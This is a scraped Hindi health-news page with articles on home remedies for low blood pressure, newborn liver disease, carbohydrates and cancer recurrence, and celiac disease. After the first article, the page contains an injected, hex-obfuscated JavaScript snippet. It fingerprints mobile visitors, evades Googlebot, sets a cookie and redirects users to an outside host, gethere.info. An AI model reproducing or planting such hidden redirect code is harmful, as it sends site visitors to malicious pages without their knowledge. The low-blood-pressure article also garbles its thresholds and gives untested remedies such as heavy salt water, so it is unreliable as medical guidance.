Connect with us

स्वास्थ्य

लो ब्लड प्रेशर पर करें ये घरेलू उपाय, जो देंगे आपको तुरंत राहत

Published

on

bloodpressure-new
File Photo

शरीर को हेल्थी रखने के साथ-साथ दिल का हेल्थी होना बेहद जरूरी है। पर आज की लाइफस्टाइल में टेंशन अनियमित खानपान, अस्वस्थ दिनचर्या हार्ट की बिमारियों को बुलता है। जो कि लॉ ब्लड प्रेशर और हाई बल्ड प्रेशर की वजह होती है। सामान्यतया ब्लड प्रेशर 120/80 होता है।

बता दें कि यदि शरीर में ब्लड प्रेशर का स्तर 90 से कम हो जाए तो इसे लॉ ब्लड प्रेशर कहा जाता है और इससे अधिक होने पर यह स्तर हाई ब्लड प्रेशर की श्रेणी में आ जाता है। बात करे लॉ ब्लड प्रेशर की तो यदि इसे गंभीरता से ना लिया जाए तो इसका असर शरीर के दूसरे अंगों पर साफ तौर पर देखा जा सकता है।

ऐसे में शरीर में ब्लड का दबाव कम होने से आवश्यक अंगों तक पूरा ब्लड नही पहुंच पाता जिससे उनके द्दारा किए गए कार्य बाधित होते है। ऐसे में दिल,फेफड़े किडनी, और दिमाग आंशिक रूप से या पूरी तरह से काम करना बंद कर देते है। ऐसे में कुछ ऐसे घरेलु उपाय है जो आपको लॉ ब्लड प्रेशर में राहत पहुचांएगें। तो आइए एक नजर डालते है उन उपायो पर।

कॉफी का करें सेवन

लॉ ब्लड प्रेशर में कॉफी बेहद काम की साबित होती है। लॉ ब्लड प्रेशर को कम करनें के लिए स्ट्रांग कॉफी, हॉट चॉकलेट, कोला और कैफीन युक्त खाद्य पदार्थो का सेवन करना असरकारक माना जाता है। यदि आपको अक्सर लॉ ब्लड प्रेशर होता है। तो आपको रोजाना सुबह एक कप कॉफी पीनी चाहिए। लेकिन यह भी ध्यान रखें कि इसके साथ कुछ न कुछ स्नेक्स वगैरह जरूर खायें।
नमक का पानी

नमक का सेवन करने से लॉ ब्लड प्रेशर सामान्य हो जाता है। नमक में सोडियम मौजूद होता है जो कि ब्लड प्रेशर बढ़ाता है। ध्यान रहें, नमक की मात्रा ज्यादा अधिक ना हो। बहुत ज्यादा मात्रा में नमक सेहत के लिए फायदेमंद नहीं माना जाता। लॉ ब्लड प्रेशर में एक गिलास पानी में डेढ़ चम्मच नमक मिलाकर सेवन किया जा सकता हैं।

लेमन जूस

ये निम्न रक्तचाप में भी फायदेमंद होता है। जब डीहाइड्रेशन की समस्या हो तो यह बहुत उपयोगी है। सुबह के वक्त लेमन जूस में हल्का सा नमक और चीनी
डालकर पिया जा सकता है। इससे शरीर को एनर्जी मिलेगी। साथ ही लीवर भी सही से काम करता है।

किशमिश

किशमिश को पारंपरिक आयुर्वेदिक दवा के रूप में माना जाता है। लो ब्लड प्रेशर होने पर किशमिश खाना बहुत फायदेमंद साबित होता है। रात में 30 से 40
किशमिश भिगो दें और सुबह खाली पेट इसका सेवन करें। जिस पानी में किशमिश भिगोई थी आप उस पानी को भी पी सकते हैं। महीने में आप ऐसा एक बार कर
सकते हैं। इसके अलावा एक गिलास दूध में 4-5 बादाम, 15-20 मूंगफली और 10 से 15 किशमिश भी मिलाकर ले सकते हैं।

गुणकारी तुलसी

तुलसी कम होते ब्लड प्रेशर को सामान्य करने में मददगार साबित होती है। इसमें विटामिन सी, पोटैशियम, मैग्नीशियम जैसे कई सेहतमंद गुण पाए जाते है। जो
दिमाग को संतुलित करते हैं और तनाव को भी दूर करते हैं। आप तुलसी का उपयोग रोज सुबह ज्यूस में डालकर कर सकते है।

 

Wefornews Bureau

 var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

ब्लॉग

नवजात शिशुओं में लीवर रोग की पहचान के लिए जागरूकता अभियान

Published

on

Liver Disease Newborns

नई दिल्ली, 19 अप्रैल | नवजात शिशुओं और छोटे बच्चों को आमतौर पर प्रभावित करने वाली लीवर की बीमारी को लेकर आम लोगों के बीच जागरूकता फैलाने के लिए अपोलो अस्पताल ने वर्ल्ड लीवर डे के मौके पर जागरूकता अभियान चलाया। अपोलो हॉस्पिटल्स ग्रुप में मेडिकल डायरेक्टर व सीनियर कन्सलटेन्ट डॉ. अनुपम सिब्बल ने कहा, “दिमाग के बाद लीवर शरीर का दूसरा सबसे बड़ा ठोस अंग है, जो बहुत सारे मुश्किल काम करता है। लीवर हमारे शरीर में ऐसे सभी कामों को अंजाम देता है, जो अन्य अंगों के ठीक कार्य करने के लिए जरूरी हैं।”

उन्होंने कहा, “लीवर पाचन में महत्वपूर्ण भूमिका निभाता है। भोजन पचाने के लिए बाईल बनाने के अलावा लीवर ब्लड शुगर को नियन्त्रित रखने में मदद करता है, शरीर से विषैले पदार्थों को बाहर निकालता है और कॉलेस्ट्रॉल का स्तर सामान्य बनाए रखता है। लीवर क्लॉटिंग फैक्टर्स, एल्बुमिन और ऐसे कई महत्वपूर्ण उत्पाद बनाता है।”

डॉ. अनुपम सिब्बल ने कहा, “लीवर बिना रुके काम करता है और अक्सर इसमें किसी भी तरह की खराबी के लक्षण जल्दी से दिखाई नहीं देते। लीवर रोगों के आम लक्षण हैं आंखों का पीला पड़ना, पेशाब का रंग पीला होना, भूख न लगना, मतली और उल्टी। 100 से ज्यादा ऐसी बीमारियां हैं जिनका असर लीवर पर पड़ता है।”

उन्होंने कहा, “अगर आपको पेट के आस-पास सूजन, पैरों में सूजन, वजन में कमी जैसे लक्षण दिखाई देते हैं तो तुरंत डॉक्टर की सलाह लें।”

डॉ. अनुपम सिब्बल ने लीवर की बीमारियों से बचने और इसके प्रबन्धन के लिए सुझाव दिए। इसमें हर बच्चे को जन्म के तुरंत बाद हेपेटाइटिस बी का टीका लगाना, रक्त और रक्त उत्पादों का इस्तेमाल करने से पहले हेपेटाइटिस बी और सी की जांच, साफ पेयजल का ही सेवन करना, कच्चे फलों और सब्जियों को सेवन से पहले अच्छी तरह धोना, जब भी संभव हो हेपेटाइटिस ए का टीका लगवाना, नवजात शिशु को अगर दो सप्ताह से ज्यादा पीलिया रहता है तो इसकी जांच करवाना चाहिए ताकि अगर लीवर की कोई बीमारी है तो इसका निदान कर तुरंत इलाज किया जा सके।

हाल ही में हेपेटाइटिस बी, सी और कई अन्य आनुवंशिक बीमारियों का इलाज खोज लिया गया है और यह सभी आधुनिक इलाज भारत में उपलब्ध हैं। भारत में लीवर ट्रांसप्लान्ट अब कामयाबी से किया जा रहा है।

–आईएएनएस

Continue Reading

स्वास्थ्य

भोजन में कार्बोहाइड्रेड ज्यादा लेने से दोबारा कैंसर का खतरा

Published

on

डाइट
File Photo

भोजन में कार्बोहाइड्रेड और शुगर की मात्रा अधिक होने से सिर और गले के कैंसर के उपचाराधीन मरीज को दोबारा कैंसर का खतरा बढ़ सकता है और वह मौत का कारण बन सकता है।

यह बात एक शोध में सामने आई है। शोध में पाया गया है कि कैंसर का इलाज से पहले के साल में जिन्होंने कार्बोहाइड्रेट और सुक्रोज, फ्रक्टोज, लैक्टोज और माल्टोज के रूप में शुगर ज्यादा लिया, उनमें मृत्यु का खतरा अधिक होता है। इंटरनेशनल जर्नल ऑफ कैंसर में प्रकाशित अध्ययन में कैंसर के 400 मरीजों में 17 फीसदी से अधिक मरीजों में कैंसर की पुनरावृत्ति दर्ज की गई, जबकि 42 फीसदी की मौत हो गई।

अरबाना शैंपैन स्थित इलिनोइस विश्वविद्यालय में प्रोफेसर और प्रमुख शोधकर्ता अन्ना ई. आर्थर ने बताया कि कार्बोहाइड्रेट खाने वाले मरीजों और अन्य मरीजों में कैंसर के प्रकार और कैंसर के चरण में अंतर पाया गया। हालांकि उपचार के बाद कम मात्रा में वसा और अनाज, आलू जैसे स्टार्च वाले भोजन खाने वाले मरीजों में बीमारी की पुनरावृत्ति व मौत के खतरे कम हो सकते हैं।

–आईएएनएस

Continue Reading

स्वास्थ्य

भारत में प्रति 100 व्यक्तियों में से एक सीलियक रोग से ग्रस्त

Published

on

celiac--
File Photo

दुनिया की आबादी का लगभग 0.7 प्रतिशत हिस्सा सीलिएक रोग से प्रभावित है। वहीं भारत में इस बीमारी से करीब 60 से 80 लाख लोगों के ग्रसित होने का अनुमान है।

ताजा आंकड़ों के मुताबिक, उत्तर भारत में प्रति 100 में एक व्यक्ति इस बीमारी से जूझ रहा है। सीलियक एक गंभीर ऑटोइम्यून डिसऑर्डर है, जो आनुवंशिक रूप से अतिसंवेदनशील लोगों में हो सकता है। आनुवंशिकी इस स्थिति के प्रसार में एक प्रमुख भूमिका निभाती है और इसलिए यह समस्या बच्चों में भी हो सकती है।

हार्ट केअर फाउंडेशन ऑफ इंडिया (एचसीएफआई) के अध्यक्ष एवं इंडियन मेडिकल एसोसिएशन (आईएमए) के पूर्व राष्ट्रीय अध्यक्ष डॉ. के. के. अग्रवाल ने कहा, “सीलियक बीमारी से पीड़ित लोग ग्लूटेन नामक प्रोटीन को पचाने में सक्षम नहीं होते हैं, जो गेहूं व जौ के आटे में पाया जाता है।

ग्लूटेन इन रोगियों के प्रतिरक्षा तंत्र को छोटी आंत में क्षति पहुंचाने के लिए सक्रिय कर देता है। परिणामस्वरूप, रोगी भोजन से पोषक तत्वों को अवशोषित नहीं कर पाते हैं और कुपोषित रहने लगते हैं, जिससे एनीमिया हो जाता है, वजन में कमी होती है और थकान रह सकती है।”

उन्होंने कहा, “सीलियक रोगियों में वसा का ठीक से अवशोषण नहीं हो पाता है। गेहूं से एलर्जी, डमेर्टाइटिस हर्पेटिफॉर्मिस, मल्टीपल स्लेरोसिस, ऑटोइम्यून डिसऑर्डर, ऑटिज्म स्पेक्ट्रम विकार यानी एडीएचडी और कुछ व्यवहार संबंधी समस्या वाले रोगियों को ग्लूटेन फ्री आहार लेने की सिफारिश की जाती है।

ग्लूटेन युक्त अनाजों में गेहूं, जौ, राई, जई और ट्रिटिकेल प्रमुख हैं। कुछ खाद्य पदार्थों में स्वाद बढ़ाने या चिपकाने वाले एजेंट के रूप में ग्लूटेन मिला दिया जाता है। ऐसी हालत में व्यक्ति को ग्लूटेन फ्री फूड खाना चाहिए।”

आईजेसीपी के समूह संपादक डॉ. अग्रवाल ने बताया, “सीलियक बीमारी वाले व्यक्ति को गेहूं, राई, सूजी, ड्यूरम, माल्ट और जौ जैसे पदार्थों से दूर रहना चाहिए। ग्लूटेन की मौजूदगी पता करने के लिए उत्पादों के लेबल को जांच लेना चाहिए।

कुछ चीजें जिनमें ग्लूटेन हो सकता है, वे हैं- डिब्बाबंद सूप, मसाले, सलाद ड्रेसिंग, कैंडीज और पास्ता आदि। उन्होंने कहा, “हालांकि, इसका यह मतलब नहीं कि भोजन में विविधता नहीं हो सकती है। चावल, ज्वार, क्विनोआ, अमरंथ, बाजरा, रागी और बकव्हीट जैसे विकल्पों का उपयोग संभव है।”

— आईएएनएस

Continue Reading
Advertisement
kathua rape case
शहर1 min ago

उत्तर प्रदेश : बारात देखने गई बच्ची से दुष्कर्म, आरोपी गिरफ्तार

world bank
राष्ट्रीय8 mins ago

भारत में बैंकिंग सेवाओं से महरूम 19 करोड़ आबादी : विश्व बैंक

Madhya Pradesh Judge
शहर14 mins ago

मप्र : हाईकोर्ट के सामने धरना देने वाले न्यायाधीश की हमेशा के लिए छुट्टी

Madhubani Painting
ज़रा हटके23 mins ago

मधुबनी पेंटिंग और इतिहास का अनूठा मेल

Satish Kumar Yadav
खेल26 mins ago

जजों के निर्णय में सुधार की आवश्यकता : मुक्केबाज सतीश

gayle
खेल34 mins ago

आईपीएल-11: गेल का शानदार शतक, हैदराबाद को 194 की चुनौती

Liver Disease Newborns
ब्लॉग48 mins ago

नवजात शिशुओं में लीवर रोग की पहचान के लिए जागरूकता अभियान

Surjewala
राजनीति3 hours ago

कांग्रेस ने उठाया सवाल- कानून मंत्री को कैसे पहले ही मिल गई अदालत के फैसले की प्रति

ioa-logo
खेल5 hours ago

भारत 2032 ओलम्पिक खेलों के लिए मेजबानी पेश करेगा

sensex
व्यापार6 hours ago

शेयर बाजारों में तेजी, सेंसेक्स 96 अंक ऊपर

reservation
राष्ट्रीय1 week ago

ओडिशा में ‘भारत बंद’ का आंशिक असर

idbi bank
राष्ट्रीय3 weeks ago

बैंक घोटालों की आई बाढ़, अब आईडीबीआई बैंक को लगा 772 करोड़ का चूना

sonia gandhi
ब्लॉग4 weeks ago

सोनिया कर पाएंगी गैर भाजपाई धड़ों को एकजुट?

Gautam Bambawale
ब्लॉग4 weeks ago

चीन के यथास्थिति में बदलाव से एक और डोकलाम संभव : भारतीय राजदूत

Skin care-
लाइफस्टाइल3 weeks ago

बदलते मौसम में इस तरह बरकरार रखें त्वचा का सौंदर्य…

लाइफस्टाइल3 weeks ago

जानिए, कौन सा रंग आपके जीवन में डालता है क्या प्रभाव…

लाइफस्टाइल3 weeks ago

अच्छे अंकों के लिए देर रात नहीं करें पढ़ाई

parliament
चुनाव4 weeks ago

राज्यसभा चुनाव: यूपी में बीजेपी को 9 और सपा को मिली 1 सीट, अन्य राज्यों में रहा ये हाल…

car
शहर4 weeks ago

तमिलनाडु: बीजेपी दफ्तर के सामने जिला सचिव की कार पर पेट्रोल बम से हमला

sensex
व्यापार2 weeks ago

शेयर बाजार में तेजी, सेंसेक्स 115 अंक ऊपर

gayle
खेल34 mins ago

आईपीएल-11: गेल का शानदार शतक, हैदराबाद को 194 की चुनौती

neha kkar-
मनोरंजन1 day ago

नेहा कक्कड़ ने बॉयफ्रेंड हिमांश कोहली को बनाया ‘हमसफर’, देखें वीडियो

Modi
राष्ट्रीय5 days ago

PM मोदी ने आदिवासी महिला को पहनाई चप्पल

-alia-bhat
मनोरंजन1 week ago

आलिया भट्ट की फिल्म ‘Raazi’ का ट्रेलर रिलीज

Delhi
शहर2 weeks ago

दिल्ली-एनसीआर में हुई बारिश, मौसम हुआ सुहाना

राजनीति2 weeks ago

गुजरात: प्रेस कॉन्फ्रेंस के दौरान एक शख्स ने रामदास अठावले पर फेंका काला कपड़ा

शहर2 weeks ago

बिना इंजन 15 किमी तक दौड़ती रही अहदाबाद-पुरी एक्सप्रेस, बाल-बाल बचे यात्री

Steve Smith
खेल3 weeks ago

बॉल टैंपरिंग मामला: रोते हुए स्मिथ ने मांगी माफी

gulam nabi azad
राष्ट्रीय3 weeks ago

विदाई भाषण में आजाद ने नरेश अग्रवाल पर ली चुटकी, कहा- वो ऐसे सूरज हैं, जो इधर डूबे उधर निकले

राष्ट्रीय4 weeks ago

3D एनीमेशन के जरिए मोदी सिखाएंगे योग, देखेंं वीडियो

Most Popular